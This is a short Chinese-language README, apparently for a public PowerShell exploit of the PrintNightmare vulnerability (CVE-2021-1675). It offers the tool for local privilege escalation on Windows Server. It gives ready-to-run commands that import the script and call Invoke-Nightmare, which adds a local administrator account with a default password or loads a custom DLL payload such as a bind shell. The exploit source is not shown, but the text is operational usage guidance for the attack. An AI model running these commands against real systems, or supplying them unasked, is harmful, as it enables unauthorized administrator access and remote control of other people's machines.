Caleb Stewart | John Hammond | July 1, 2021
CVE-2021-1675 是一个被称作“PrintNightmare”的关键远程代码执行和本地权限提升漏洞。
已发布了针对远程代码执行能力的概念验证漏洞利用代码(Python、C++),以及用于本地权限提升的 C# 版本。我们尚未见过纯 PowerShell 的原生实现,因此希望尝试优化和重写该漏洞利用。
此 PowerShell 脚本使用 PrintNightmare 攻击技术执行本地权限提升(LPE)。

已在 Windows Server 2016 和 Windows Server 2019 上测试通过。
默认添加一个新用户到本地管理员组:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
提供自定义 DLL 负载,以实现其他任何您需要的操作。
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"